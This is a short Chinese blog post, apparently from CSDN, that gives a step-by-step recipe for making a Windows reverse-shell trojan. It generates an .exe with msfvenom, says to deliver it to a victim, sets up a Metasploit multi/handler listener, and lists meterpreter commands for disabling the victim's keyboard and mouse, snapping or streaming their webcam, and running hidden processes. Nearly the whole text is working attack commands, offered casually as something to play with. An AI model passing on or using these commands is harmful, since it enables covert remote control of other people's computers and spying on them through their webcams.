通过msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe
把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接
在kali中
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 172.16.4.3 #设置本地ip
lhost => 172.16.4.3
msf exploit(multi/handler) > set lport 44444 #设置本地端口
lport => 44444
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 172.16.4.3:44444
tcp链接以后可以使用以下功能
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
webcam摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频
execute执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
只列出一部分详细参见下面链接
咳咳。。。。玩玩就好
来源:CSDN
作者:舌耳
链接:https://blog.csdn.net/weixin_38280090/article/details/83511530